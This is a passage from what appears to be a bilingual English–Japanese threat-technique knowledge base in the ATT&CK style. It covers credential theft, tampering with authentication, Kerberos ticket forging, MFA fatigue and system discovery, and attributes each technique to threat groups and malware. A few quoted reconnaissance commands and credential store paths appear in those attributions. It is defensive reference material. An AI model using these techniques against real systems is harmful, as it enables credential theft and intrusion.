NirSoft tools to steal user credentials from the infected machine. NirSoft tools are executed via process hollowing in a newly-created instance of vbc.exe or regasm.exe. NPPSPY captures credentials by recording them through an alternative network listener registered to the <code>mpnotify.exe</code> process, allowing for cleartext recording of logon information. 敵対者は、パスワードマネージャやブラウザ・キーチェーンなどのパスワードストアから認証情報を窃取することがある。 Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information. 敵対者は、macOSのキーチェーンから認証情報を取得することがある。Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service. 敵対者は、macOSのsecuritydプロセスのメモリから認証情報を取得することがある。An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization. A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc. 敵対者は、Webブラウザに保存された認証情報を取得することがある。Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers. 敵対者は、Windows資格情報マネージャから認証情報を取得することがある。Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults). 敵対者は、パスワードマネージャから認証情報を取得することがある。Adversaries may acquire user credentials from third-party password managers. Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk. 敵対者は、クラウドのシークレット管理ストアから認証情報を取得することがある。Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault. 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 パスワードストアからの認証情報窃取に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the SolarWinds Compromise, APT29 used account credentials they obtained to attempt access to Group Managed Service Account (gMSA) passwords. During the 2025 Poland Wiper Attacks, the adversaries configured a native CLI to gather a targeted elevated users password using `grep`. FIN6 has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP. Stealth Falcon malware gathers passwords from multiple sources, including Windows Credential Vault and Outlook. OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access. APT33 has used a variety of publicly available tools like LaZagne to gather credentials. MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email. Leafminer used several tools for retrieving login and password information, including LaZagne. APT39 has used the Smartftp Password Decryptor tool to decrypt FTP passwords. APT41 has obtained information about accounts, lists of employees, and plaintext and hashed passwords from databases. Evilnum can collect email credentials from victims. HEXANE has run `cmdkey` on victim machines to identify stored credentials. Volt Typhoon has attempted to obtain credentials from OpenSSH, realvnc, and PuTTY. Malteiro has obtained credentials from mail clients via NirSoft MailPassView. Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the credential vault and DPAPI. PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by PinchDuke include ones associated with many sources such as The Bat!, Yahoo!, Mail.ru, Passport.Net, Google Talk, and Microsoft Outlook. CosmicDuke collects user credentials, including passwords, for various programs including popular instant messaging applications and email clients as well as WLAN keys. A module in Prikormka collects passwords stored in applications installed on the victim. OLDBAIT collects credentials from several email clients. Matryoshka is capable of stealing Outlook passwords. Pupy can use Lazagne for harvesting credentials. NETWIRE can retrieve passwords from messaging and mail client applications. QuasarRAT can obtain passwords from common FTP clients. Agent Tesla has the ability to steal credentials from FTP clients and wireless profiles. LaZagne can obtain credentials from databases, mail, and WiFi across multiple platforms. Astaroth uses an external software known as NetPass to recover passwords. PoshC2 can decrypt passwords stored in the RDCMan configuration file. PLEAD has the ability to steal saved passwords from Microsoft Outlook. Lokibot has stolen credentials from multiple applications and data sources including Windows OS credentials, email clients, FTP, and SFTP clients. Carberp's passw.plug plugin can gather account information from multiple instant messaging, email, and social media services, as well as FTP, VNC, and VPN clients. KGH_SPY can collect credentials from WINSCP. DarkGate use Nirsoft Network Password Recovery or NetPass tools to steal stored RDP credentials in some malware versions. Mispadu has obtained credentials from mail clients via NirSoft MailPassView. MgBot includes modules for stealing stored credentials from Outlook and Foxmail email client software. Manjusaka extracts credentials from the Windows Registry associated with Premiumsoft Navicat, a utility used to facilitate access to various database types. XLoader can collect credentials stored in email clients. RedLine Stealer has obtained credentials from VPN services, FTP clients and Instant Messenger (IM)/Chat clients. BeaverTail has collected keys stored for Solana stored in `.config/solana/id.json` and other login details associated with macOS within `/Library/Keychains/login.keychain` or for Linux within `/.local/share/keyrings`. MirrorStealer has the ability to steal credentials from email clients. 敵対者は、OSやアプリの認証メカニズムを改変し、正規認証情報なしでのアクセスや認証情報の取得を行うことがある。 Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using Valid Accounts. 敵対者は、ドメインコントローラの認証処理を改変することがある。Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. 敵対者は、パスワードフィルタDLLを登録して平文パスワードを取得することがある。Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. 敵対者は、LinuxのPAMを改変して認証を回避・取得することがある。Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>. 敵対者は、ネットワーク機器の認証処理を改変することがある。Adversaries may use Patch System Image to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices. 敵対者は、可逆暗号化を有効化してパスワードを取得しやすくすることがある。An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it. 敵対者は、MFAの設定を改変して回避することがある。Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts. 敵対者は、ハイブリッドID基盤の認証処理を改変することがある。Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts. 敵対者は、ネットワークプロバイダDLLを悪用して認証情報を取得することがある。Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions. During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening. 敵対者は、条件付きアクセスポリシーを改変して認証制御を回避することがある。Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource. アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 レジストリキーの権限を制限し、不正な改変を防ぐ。 特権プロセスの完全性を保護し、不正なコード注入を防ぐ。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 OSを安全に構成し、攻撃対象領域を縮小する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 認証プロセスの変更に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 ArcaneDoor included modification of the AAA process to bypass authentication mechanisms. FIN13 has replaced legitimate KeePass binaries with trojanized versions to collect passwords from numerous applications. Ebury can intercept private keys using a trojanized <code>ssh-add</code> function. Kessel has trojanized the <sode>ssh_login</code> and <code>user-auth_pubkey</code> functions to steal plaintext credentials. SILENTTRINITY can create a backdoor in KeePass using a malicious config file and in TortoiseSVN using a registry hook. DRYHOOK has intercepted and logged user credentials by modifying the Perl module in Ivanti Connect Secure VPN edge-devices located within `/home/perl/DSAuth.pm`. 敵対者は、ネットワーク上で通信経路に割り込み（中間者攻撃）、認証情報や情報を傍受・改ざんすることがある。 Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as Network Sniffing, Transmitted Data Manipulation, or replay attacks (Exploitation for Credential Access). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions. 敵対者は、LLMNR/NBT-NS等の名前解決を汚染しSMBリレーで認証情報を取得することがある。By responding to LLMNR/NBT-NS/mDNS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. 敵対者は、ARPキャッシュを汚染して通信を傍受することがある。Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as Network Sniffing or Transmitted Data Manipulation. 敵対者は、不正なDHCP応答で通信経路を奪い傍受することがある。Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as Network Sniffing or Transmitted Data Manipulation. 敵対者は、正規を装った偽のWi-Fiアクセスポイントを設置して通信を傍受することがある。Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as Network Sniffing, Transmitted Data Manipulation, or Input Capture. ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 ネットワークを分割し、横展開や影響範囲を限定する。 ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 ネットワーク越しのリソースアクセスを制限する。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 機微情報を暗号化し、窃取時の影響を軽減する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 中間者（AiTM）に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 ArcaneDoor included interception of HTTP traffic to victim devices to identify and parse command and control information sent to the device. Kimsuky has used modified versions of PHProxy to examine web traffic between the victim and the accessed website. Mustang Panda leveraged a captive portal hijack that redirected the victim to a webpage that prompted the victim to download a malicious payload. Sea Turtle modified DNS records at service providers to redirect traffic from legitimate resources to Sea Turtle-controlled servers to enable adversary-in-the-middle attacks for credential capture. Dok proxies web traffic to potentially monitor and alter victim HTTP(S) traffic. NPPSPY opens a new network listener for the <code>mpnotify.exe</code> process that is typically contacted by the Winlogon process in Windows. A new, alternative RPC channel is set up with a malicious DLL recording plaintext credentials entered into Winlogon, effectively intercepting and redirecting the logon information. Line Runner intercepts HTTP requests to the victim Cisco ASA, looking for a request with a 32-character, victim dependent parameter. If that parameter matches a value in the malware, a contained payload is then written to a Lua script and executed. evilginx2 has the ability to act as an adversary-in-the-middle (AiTM) relay between a legitimate website and a phished user to capture all transmitted data including usernames, passwords, authentication tokens, and session cookies and tokens. 敵対者は、Kerberosチケットを窃取または偽造して認証を行うことがある。Golden/Silver Ticket等が含まれる。 Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable Pass the Ticket. Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC). Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access. 敵対者は、KRBTGTハッシュからゴールデンチケットを偽造することがある。Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket. Golden tickets enable adversaries to generate authentication material for any account in Active Directory. 敵対者は、サービスアカウントのハッシュからシルバーチケットを偽造することがある。Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets. 敵対者は、サービスチケットを要求しオフラインでパスワードを解読することがある。Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to Brute Force. 敵対者は、事前認証が無効なアカウントのAS-REPを取得しオフライン解読することがある。Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by Password Cracking Kerberos messages. 敵対者は、保存されたKerberos資格情報キャッシュ（ccache）を窃取することがある。Adversaries may attempt to steal Kerberos tickets stored in credential cache files (or ccache). These files are used for short term storage of a user's active session credentials. The ccache file is created upon user authentication and allows for access to multiple services without the user having to re-enter credentials. Active Directoryを適切に構成し、攻撃対象領域を縮小する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 機微情報を暗号化し、窃取時の影響を軽減する。 認証情報の保存領域へのアクセスを保護する。 システムやアカウントを監査し、不正な活動を検出する。 Kerberosチケットの窃取/偽造に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the 2025 Poland Wiper Attacks, the adversaries used the Rubeus tool to forge a Diamond Ticket that is a modified legitimate Kerberos ticket. Akira have used scripts to dump Kerberos authentication credentials. 敵対者は、Webクッキーやセッショントークン（SAML等）を偽造して認証を回避することがある。 Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access. 敵対者は、Webクッキーを偽造して認証を回避することがある。Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access. 敵対者は、SAMLトークンを偽造してSSO認証を回避することがある。An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate. The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>. Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism. アカウントの作成・権限・ライフサイクルを適切に管理する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 ソフトウェアを安全に構成し、悪用を防ぐ。 Web認証情報の偽造に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、有効な認証情報を持つ状態で大量のMFA要求を発生させ、ユーザーの承認（MFA疲労攻撃）を誘うことがある。 Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users. ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 ログイン試行回数やロックアウト等のアカウント使用ポリシーを設定する。 多要素認証リクエストの生成に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During C0027, Scattered Spider attempted to gain access by continuously sending MFA messages to the victim until they accept the MFA push challenge. APT29 has used repeated MFA requests to gain access to victim accounts. LAPSUS$ has spammed target users with MFA prompts in the hope that the legitimate user will grant necessary approval. Scattered Spider has used multifactor authentication (MFA) fatigue by sending repeated MFA authentication requests to targets. 敵対者は、認証に使われるデジタル証明書を窃取または偽造して、なりすまし認証を行うことがある。 Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts. Active Directoryを適切に構成し、攻撃対象領域を縮小する。 機微情報を暗号化し、窃取時の影響を軽減する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 システムやアカウントを監査し、不正な活動を検出する。 認証証明書の窃取/偽造に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 APT29 has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates. Mimikatz's `CRYPTO` module can create and export various types of authentication certificates. AADInternals can create and export various authentication certificates, including those associated with Azure AD joined/registered devices. 敵対者は、稼働中のサービスを列挙して環境を把握することがある。 Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>. Adversaries may also gather information about schedule tasks via commands such as `schtasks` on Windows or `crontab -l` on Linux and macOS. システムサービスの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation CuckooBees, the threat actors used the `net start` command as part of their initial reconnaissance. During Operation Wocao, threat actors used the `tasklist` command to search for one of its backdoors. Ke3chang performs service discovery using <code>net start</code> commands. APT1 used the commands <code>net start</code> and <code>tasklist</code> to get a listing of the services on the system. Turla surveys a system upon check-in to discover running services and associated processes using the <code>tasklist /svc</code> command. admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to obtain information about services: <code>net start >> %temp%\download</code> After compromising a victim, Poseidon Group discovers all running services. OilRig has used <code>sc query</code> on a victim to gather information about services. BRONZE BUTLER has used TROJ_GETVERSION to discover system services. Kimsuky has used an instrumentor script to gather the names of all services running on a victim's system. Chimera has used <code>net start</code> and <code>net use</code> for system service discovery. Indrik Spider has used the win32_service WMI class to retrieve a list of services from the system. TeamTNT has searched for services such as Alibaba Cloud Security's aliyun service and BMC Helix Cloud Security's bmc-agent service in order to disable them. Aquatic Panda has attempted to discover services for third party EDR products. Earth Lusca has used Tasklist to obtain information from a compromised host. Volt Typhoon has used `net start` to list running services. MirrorFace has used Tasklist for discovery post compromise. Ixeshe can list running services. Sykipot may use <code>net start</code> to display running services. Dyre has the ability to identify running services on a compromised host. The <code>net start</code> command can be used in Net to find information about Windows services. GeminiDuke collects information on programs and services on the victim that are configured to automatically run at startup. Tasklist can be used to discover services running on a system. Elise executes <code>net start</code> after initial communication is made to the remote server. Emissary has the capability to execute the command <code>net start</code> to interact with services. S-Type runs the command <code>net start</code> on a victim. ZLib has the ability to discover and manipulate Windows services. Epic uses the <code>tasklist /svc</code> command to list the services on the system. BBSRAT can query service configuration information. Cobalt Strike can enumerate services on compromised hosts. Volgmer queries the system to identify existing services. JPIN can list running services. Hydraq creates a backdoor through which remote attackers can monitor services. WINERACK can enumerate services. Kwampirs collects a list of running services with the command <code>tasklist /svc</code>. GravityRAT has a feature to list the available services on the system. RATANKBA uses <code>tasklist /svc</code> to display running tasks. SynAck enumerates all running services. Comnie runs the command: <code>net start >> %TEMP%\info.dat</code> on a victim. InvisiMole can obtain running services on the victim. TrickBot collects a list of install programs and services on the system’s machine. jRAT can list local services. GreyEnergy enumerates all Windows services. PoshC2 can enumerate service and service permission information. Ursnif has gathered information about running services. HyperBro can list all services and their configurations. ZxShell can check the services on the system. HotCroissant has the ability to retrieve a list of services on the infected host. REvil can enumerate active services. SLOTHFULMEDIA has the capability to enumerate services. SUNBURST collected a list of service names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists. BitPaymer can enumerate existing Windows services on the host that are configured to run as LocalSystem. Caterpillar WebShell can obtain a list of the services from a system. LookBack can enumerate services on the victim machine. SombRAT can enumerate services on a victim machine. Cuba can query service status using <code>QueryServiceStatusEx</code> function. RainyDay can create and register a service for execution. Babuk can enumerate all services running on a compromised host. SysUpdate can collect a list of services on a victim machine. SILENTTRINITY can search for modifiable services that could be used for privilege escalation. Heyoka Backdoor can check if it is running as a service on a compromised host. DarkTortilla can retrieve information about a compromised system's running services. Black Basta can check whether the service name `FAX` is present. Sardonic has the ability to execute the `net start` command. PUBLOAD has leveraged `tasklist` to gather running services on victim host. Qilin can identify specific services for termination or to be left running at execution. Medusa Ransomware has leveraged an encoded list of services that it designates for termination. Embargo has obtained active services running on the victim’s system through the functions `OpenSCManagerW()` and `EnumServicesStatusExW()`. LAMEHUG can gather service information on targeted systems. 敵対者は、開いているアプリのウィンドウを列挙して環境を把握することがある。 Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used. For example, information about application windows could be used identify potential data to collect as well as identifying security tooling (Security Software Discovery) to evade. アプリケーションウィンドウの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Lazarus Group malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KilaAlfa keylogger also reports the title of the window in the foreground. HEXANE has used a PowerShell-based keylogging tool to capture the window title. Volt Typhoon has collected window title information from compromised systems. PoisonIvy captures window titles. NetTraveler reports window names along with keylogger information to provide application context. The discovery modules used with Duqu can collect information on open windows. Trojan.Karagany can monitor the titles of open windows to identify specific keywords. PowerDuke has a command to get text of the current foreground window. SOUNDBITE is capable of enumerating application windows. NETWIRE can discover and close windows on controlled systems. WINERACK can enumerate active windows. ROKRAT can use the `GetForegroundWindow` and `GetWindowText` APIs to discover where the user is typing. InvisiMole can enumerate windows and child windows on a compromised host. Catchamas obtains application windows titles and then determines which windows to perform Screen Capture on. APT-C-36 used a customized version of QuasarRAT to monitor browser windows for strings relating to specific Colombian financial institutions. Kazuar gathers information about opened windows. Remcos can list all windows on victim systems. Remexi has a command to capture active windows on the machine and retrieve window titles. njRAT gathers information about opened windows during the initial infection. Machete saves the window names. HotCroissant has the ability to list the names of all open windows on the infected host. PLEAD has the ability to list open windows on the compromised host. Attor can obtain application window titles and then determines which windows to perform Screen Capture on. Cadelspy has the ability to identify open windows on the compromised host. Metamorfo can enumerate all windows on the victim’s machine. Aria-body has the ability to identify the titles of running windows on a compromised host. Grandoreiro can identify installed security tools based on window names. QakBot has the ability to enumerate windows on a compromised host. DarkWatchman reports window names along with keylogger information to provide application context. SILENTTRINITY can enumerate the active Window during keylogging through execution of `GetActiveWindowTitle`. Flagpro can check the name of the window displayed on the system. FunnyDream has the ability to discover application windows via execution of `EnumWindows`. NightClub can use `GetForegroundWindow` to enumerate the active window. DarkGate will search for cryptocurrency wallets by examining application window names for specific strings. DarkGate extracts information collected via NirSoft tools from the hosting process's memory by first identifying the window through the <code>FindWindow</code> API function. DUSTTRAP can enumerate running application windows. PAKLOG has used `GetForegroundWindow` to access the foreground window. PAKLOG has also captured text from the foreground windows. TONESHELL has used `GetForegroundWindow` to detect virtualization or sandboxes by calling the API twice and comparing each window handle. 敵対者は、レジストリを照会して環境や設定を把握することがある。 Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software. レジストリの照会に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Wocao, the threat actors executed `/c cd /d c:\windows\temp\ & reg query HKEY_CURRENT_USER\Software\<username>\PuTTY\Sessions\` to detect recent PuTTY sessions, likely to further lateral movement. Turla surveys a system upon check-in to discover information in the Windows Registry with the <code>reg query</code> command. Turla has also retrieved PowerShell payloads hidden in Registry keys as well as checking keys associated with null session named pipes . A Threat Group-3390 tool can read and decrypt stored Registry values. Lotus Blossom has run commands such as `reg query HKLM\SYSTEM\CurrentControlSet\Services\[service name]\Parameters` to verify if installed implants are running as a service. Lazarus Group malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnyware, and Remote Desktop. Another Lazarus Group malware sample checks for the presence of the following Registry key:<code>HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt</code>. Dragonfly has queried the Registry to identify victim information. Stealth Falcon malware attempts to determine the installed version of .NET by querying the Registry. Gamaredon Group has queried ` HKEY_CURRENT_USER\\Console\\WindowsUpdates` to obtain the C2 addresses. Gamaredon Group has queried ` HKEY_CURRENT_USER\\Console\\WindowsUpdates` to obtain the C2 addresses. OilRig has used <code>reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default”</code> on a victim to query the Registry. APT32's backdoor can query the Windows Registry to gather system information. APT39 has used various strains of malware to query the Registry. Kimsuky has obtained specific Registry keys and values on a compromised host. APT41 queried registry values to determine items such as configured RDP ports and network configurations. Chimera has queried Registry keys using <code>reg query \\<host>\HKU\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers</code> and <code>reg query \\<host>\HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\Internet Settings</code>. Fox Kitten has accessed Registry hives ntuser.dat and UserClass.dat. Indrik Spider has used a service account to extract copies of the `Security` Registry hive. ZIRCONIUM has used a tool to query the Registry for proxy settings. Volt Typhoon has queried the Registry on compromised systems, `reg query hklm\software\`, for information on installed software including PuTTY. Daggerfly used Reg to dump the Security Account Manager (SAM), System, and Security Windows registry hives from victim machines. BlackByte queried registry values to determine system language settings. Taidoor can query the Registry on compromised hosts using <code>RegQueryValueExA</code>. PlugX can enumerate and query for information contained within the Windows Registry. Derusbi is capable of enumerating Registry keys and values. Uroburos can query the Registry, typically `HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds`, to find the key and path to decrypt and load its kernel driver and kernel driver loader. CHOPSTICK provides access to the Windows Registry, which can be used to gather information. Carbanak checks the Registry key <code>HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings</code> for proxy configurations information. BACKSPACE is capable of enumerating and making modifications to an infected system's Registry. gh0st RAT has checked for the existence of a Service key to determine if it has already been installed on the system. ADVSTORESHELL can enumerate registry keys. Reg may be used to gather details from the Windows Registry of a local or remote system at the command-line interface. Epic uses the <code>rem reg query</code> command to obtain values from Registry keys. Crimson can check the Registry for the presence of <code>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\last_edate</code> to determine how long it has been installed on a host. ComRAT can check the default browser by querying <code>HKCR\http\shell\open\command</code>. Shamoon queries several Registry keys to identify hard disk partitions to overwrite. POWERSOURCE queries Registry keys in preparation for setting Run keys to achieve persistence. Cobalt Strike can query <code>HKEY_CURRENT_USER\Software\Microsoft\Office\<Excel Version>\Excel\Security\AccessVBOM\</code> to determine if the security setting for restricting default programmatic access is enabled. WINDSHIELD can gather Registry values. OSInfo queries the registry to look for information about Terminal Services. Reaver queries the Registry to determine the correct Startup path to use for persistence. Volgmer checks the system for certain Registry keys. FinFisher queries Registry values as part of its anti-sandbox checks. POWRUNER may query the Registry by running <code>reg query</code> on a victim. DownPaper searches and reads the value of the Windows Update Registry Run key. PowerSploit contains a collection of Privesc-PowerUp modules that can query Registry keys for potential opportunities. JPIN can enumerate Registry keys. Hydraq creates a backdoor through which remote attackers can retrieve system information, such as CPU speed, from Registry keys. Proxysvc gathers product names from the Registry key: <code>HKLM\Software\Microsoft\Windows NT\CurrentVersion ProductName</code> and the processor description from the Registry key <code>HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ProcessorNameString</code>. Bankshot searches for certain Registry keys to be configured before executing the payload. ROKRAT can access the <code>HKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosData</code> Registry key to obtain the System manufacturer value to identify the machine type. RATANKBA uses the command <code>reg query “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\InternetSettings”</code>. SynAck enumerates Registry keys associated with event logs. Gold Dragon enumerates registry keys with the command <code>regkeyenum</code> and obtains information for the Registry key <code>HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</code>. Zebrocy executes the <code>reg query</code> command to obtain information in the Registry. Brave Prince gathers information about the Registry. InvisiMole can enumerate Registry values, keys, and data. FELIXROOT queries the Registry for specific keys for potential privilege escalation and proxy information. FELIXROOT has also used WMI to query the Windows Registry. Bisonal has used the RegQueryValueExA function to retrieve proxy information in the Registry. QUADAGENT checks if a value exists within a Registry key in the HKCU hive whose name is the same as the scheduled task it has created. Zeus Panda checks for the existence of a Registry key and if it contains certain values. Remcos can 